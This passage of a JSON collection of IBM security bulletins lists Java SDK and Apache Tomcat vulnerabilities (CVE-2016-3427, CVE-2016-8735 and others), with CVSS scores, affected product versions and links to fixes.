SDK, Java Technology Edition. There are other advisories included in the IBM Java SDK but WebSphere Application Server is not vulnerable to them. You will need to evaluate your own code to determine if you are vulnerable. Please refer to the Reference section for more information on the advisories not applicable to WebSphere Application Server. HP fixes are on a delayed schedule. \n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\nPlease consult the security bulletin [_Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected IBM WebSphere Application Server Version \n---|--- \nTivoli Netcool Performance Manager version 1.3.1, 1.3.2, 1.3.3, 1.4.0, 1.4.1| WAS version: 8.5.0.0 through 8.5.5.9, Version 8.0.0.0 through 8.0.0.12, Version 7.0.0.0 through 7.0.0.41. \n\n \n\u00b7 This does not occur on IBM Java SDK shipped with WebSphere Application Servers Fix Packs 8.5.5.10, 8.0.0.13 and 7.0.0.43 or later. \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T15:23:23", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427) shipped with Tivoli Netcool Performance Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T15:23:23", "id": "84CC191C6FF7D7F095AAC167AD676E34BADFF5788D009121FE195F8179866081", "href": "https://www.ibm.com/support/pages/node/279315", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:51:51", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Technology Edition, Version 6 \nthat is used by IBM Initiate Master Data Service. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nThese vulnerabilities are known to affect the following offerings: \n \nIBM Initiate Master Data Service versions 9.5, 9.7, 10.0, 10.1 (impacts _Master Data Engine_ component, [_Message Brokers_](<http://pic.dhe.ibm.com/infocenter/mdm/v11r0/topic/com.ibm.mdshs.hubover.doc/topics/c_hubover_message_broker_suite.html>) component and _Workbench_ component)\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the fix as soon as practical. Please see below for information on the fixes available. \n\n**_Product_**| **_VRMF_**| **_APAR_**| **_Remediation/First Fix_** \n---|---|---|--- \nIBM Initiate Master Data Service | \n\n9.5\n\n| None| [_9.5.052516_IM_Initiate_MasterDataService_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Master+Data+Service&release=All&platform=All&function=fixId&fixids=9.5.052516_IM_Initiate_MasterDataService_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Patient| \n\n9.5\n\n| None| [_9.5.052516_IM_Initiate_Patient_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Patient&release=All&platform=All&function=fixId&fixids=9.5.052516_IM_Initiate_Patient_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Provider| \n\n9.5\n\n| None| [_9.5.052516_IM_Initiate_Provider_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Provider&release=All&platform=All&function=fixId&fixids=9.5.052516_IM_Initiate_Provider_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Master Data Service | \n\n9.7\n\n| None| [_9.7.052516_IM_Initiate_MasterDataService_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Master+Data+Service&release=All&platform=All&function=fixId&fixids=9.7.052516_IM_Initiate_MasterDataService_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Patient| \n\n9.7\n\n| None| [_9.7.052516_IM_Initiate_Patient_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Patient&release=All&platform=All&function=fixId&fixids=9.7.052516_IM_Initiate_Patient_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Provider| \n\n9.7\n\n| None| [_9.7.052516_IM_Initiate_Provider_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Provider&release=All&platform=All&function=fixId&fixids=9.7.052516_IM_Initiate_Provider_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Master Data Service| \n\n10.0\n\n| None| [_10.0.052516_IM_Initiate_MasterDataService_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Master+Data+Service&release=All&platform=All&function=fixId&fixids=10.0.052516_IM_Initiate_MasterDataService_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Patient| \n\n10.0\n\n| None| [_10.0.052516_IM_Initiate_Patient_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Patient&release=All&platform=All&function=fixId&fixids=10.0.052516_IM_Initiate_Patient_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Provider| \n\n10.0\n\n| None| [_10.0.052516_IM_Initiate_Provider_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Provider&release=All&platform=All&function=fixId&fixids=10.0.052516_IM_Initiate_Provider_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Master Data Service| \n\n10.1\n\n| None| [_10.1.052516_IM_Initiate_MasterDataService_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Master+Data+Service&release=All&platform=All&function=fixId&fixids=10.1.052516_IM_Initiate_MasterDataService_ALL_InterimFix&includeSupersedes=0&source=fc>) \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T14:01:57", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Initiate Master Data Service (CVE-2016-3426, CVE- 2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-16T14:01:57", "id": "F35F5FE0DA298C18416599A44F6A3AC496F0F4FEC9098F354459A1FB95F4A01E", "href": "https://www.ibm.com/support/pages/node/279735", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:05", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Records Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the [_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Records Manager 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \nIBM Records Manager 8.5.0.6| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \nIBM Records Manager 8.5.0.7| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T12:16:04", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Records Manager (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T12:16:04", "id": "3C13E1626546AB19B54BC13C855DB4A4A72EDBD9013028CD74215F23DDA82984", "href": "https://www.ibm.com/support/pages/node/282275", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:10", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Content Manager Records Enabler. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Security Bulletin: Security Vulnerability in IBM WebSphere Application Server (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \n \nIBM Content Manager Records Enabler 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \n \nIBM Content Manager Records Enabler 8.5.0.6 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \n \nIBM Content Manager Records Enabler 8.5.0.7 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T12:15:34", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Content Manager Records Enabler (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T12:15:34", "id": "300B30B77E64A29C8B399F8C62E9F501F6C76F9367F47CB2AECB5124ADBB7048", "href": "https://www.ibm.com/support/pages/node/278711", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:45:51", "description": "## Summary\n\nIssues with Apache Tomcat Vulnerabilities have been addressed.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-6817_](<https://vulners.com/cve/CVE-2016-6817>) \n**DESCRIPTION:** Apache Tomcat is vulnerable to a denial of service. By sending a specially crafted HTTP/2 header, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119156_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119156>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [_CVE-2016-8735_](<https://vulners.com/cve/CVE-2016-8735>) \n**DESCRIPTION:** Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119157_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119157>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [_CVE-2016-6816_](<https://vulners.com/cve/CVE-2016-6816>) \n**DESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119158_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119158>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nIBM UrbanCode Deploy 6.0, 6.0.1, 6.0.1.1, 6.0.1.2, 6.0.1.3, 6.0.1.4, 6.0.1.5, 6.0.1.6, 6.0.1.7, 6.0.1.8, 6.0.1.9, 6.0.1.10, 6.0.1.11, 6.0.1.12, 6.0.1.13, 6.0.1.14, 6.1, 6.1.0.1, 6.1.0.2, 6.1.0.3, 6.1.0.4, 6.1.1, 6.1.1.1, 6.1.1.2, 6.1.1.3, 6.1.1.4, 6.1.1.5, 6.1.1.6, 6.1.1.7, 6.1.1.8, 6.1.2, 6.1.3, 6.1.3.1, 6.1.3.2, 6.1.3.3, 6.2.0.0, 6.2.0.1, 6.2.0.2, 6.2.1, 6.2.1.1, 6.2.2, 6.2.2.1 on all supported platforms.\n\n## Remediation/Fixes\n\nFor IBM UrbanCode Deploy versions 6.2 through 6.2.2.1, upgrade to [IBM UrbanCode Deploy 6.2.3](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/IBM+UrbanCode+Deploy&release=6.2.3&platform=All&function=all>). \n\n\nFor IBM UrbanCode Deploy versions 6.1 to 6.1.3.3, upgrade the server to [IBM UrbanCode Deploy 6.1.3.4](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/IBM+UrbanCode+Deploy&release=6.1.3&platform=All&function=all>).\n\nFor IBM UrbanCode Deploy versions 6.0 to 6.0.1.14, upgrade the server to [IBM UrbanCode Deploy 6.0.1.15](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/IBM+UrbanCode+Deploy&release=6.0.1.15&platform=All&function=all>).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-15T22:00:02", "type": "ibm", "title": "Security Bulletin: Open Source Apache Tomcat Vulnerabilities (CVE-2016-6817, CVE-2016-8735, CVE-2016-6816)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2018-11-15T22:00:02", "id": "3E52F30DE645ED79947372BF790D5DAB4B5FA29866C26DA53811D62A4E0B3206", "href": "https://www.ibm.com/support/pages/node/619363", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-13T09:36:12", "description": "## Summary\n\nApache Tomcat vulnerability affects IBM Storwize V7000 Unified.\n\n## Vulnerability Details\n\nThis bulletin relates to vulnerabilities in the Apache Tomcat component which is used to provide the product\u2019s management GUI. The CLI interface is unaffected. \n \n**CVEID:** [_CVE-2016-6816_](<https://vulners.com/cve/CVE-2016-6816>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119158_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119158>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n\n**CVEID:** [_CVE-2016-6817_](<https://vulners.com/cve/CVE-2016-6817>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to a denial of service. By sending a specially crafted HTTP/2 header, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119156_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119156>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [_CVE-2016-8735_](<https://vulners.com/cve/CVE-2016-8735>)** \nDESCRIPTION:** Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119157_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119157>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Storwize V7000 Unified \nThe product is affected when running code releases 1.5.0.0 to 1.5.2.5 and 1.6.0.0 to 1.6.2.0\n\n## Remediation/Fixes\n\nA fix for these issues is in version 1.5.2.6 and 1.6.2.1 of IBM Storwize V7000 Unified. Customers running an affected version of IBM Storwize V7000 Unified should upgrade to 1.5.2.6 or 1.6.2.1 or a later version, so that the fix gets applied. \n \n[_Latest Storwize V7000 Unified Software_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003918&myns=s028&mynp=OCST5Q4U&mync=E>) \n \nPlease contact IBM support for assistance in upgrading your system.\n\n## Workarounds and Mitigations\n\nWorkaround(s) : None. \n \nMitigation(s) : Although IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T00:32:15", "type": "ibm", "title": "Security Bulletin: Apache Tomcat vulnerability affects IBM Storwize V7000 Unified (CVE-2016-6816, CVE-2016-6817, CVE-2016-8735 )", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2018-06-18T00:32:15", "id": "029AA49A507A723A5E4C56429FB5A19F84FFBFB3D81F702E5C7D95F238C49FAF", "href": "https://www.ibm.com/support/pages/node/696927", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-13T09:36:15", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Technology used in IBM Network Advisor.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>) \n**DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVEID:** [CVE-2016-3425](<https://vulners.com/cve/CVE-2016-3425>) \n**DESCRIPTION:** An unspecified vulnerability in Oracle Java SE Java, SE Embedded and JRockit related to the JAXP component could allow a remote attacker to cause a denial of service resulting in a partial availability impact using unknown attack vectors. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/112460> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n**CVEID:** [_CVE-2016-0695_](<https://vulners.com/cve/CVE-2016-0695>)**DESCRIPTION:** An unspecified vulnerability in Oracle Java SE Java SE Embedded and JRockit related to the Security component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 2.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112458_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112458>) for the current score \nCVSS Environmental Score*: UndefinedCVSS Vector: (AV:N/AC:H/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nIBM Network Advisor Versions prior to 14.0.2\n\n## Remediation/Fixes\n\nFixes are in IBM Network Advisor Versions 14.0.2 \n[_http://www-01.ibm.com/support/docview.wss?uid=ssg1S1009621_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1009621>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:28:27", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Network Advisor (CVE-2016-3425, CVE-2016-3427, CVE-2016-0695).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, 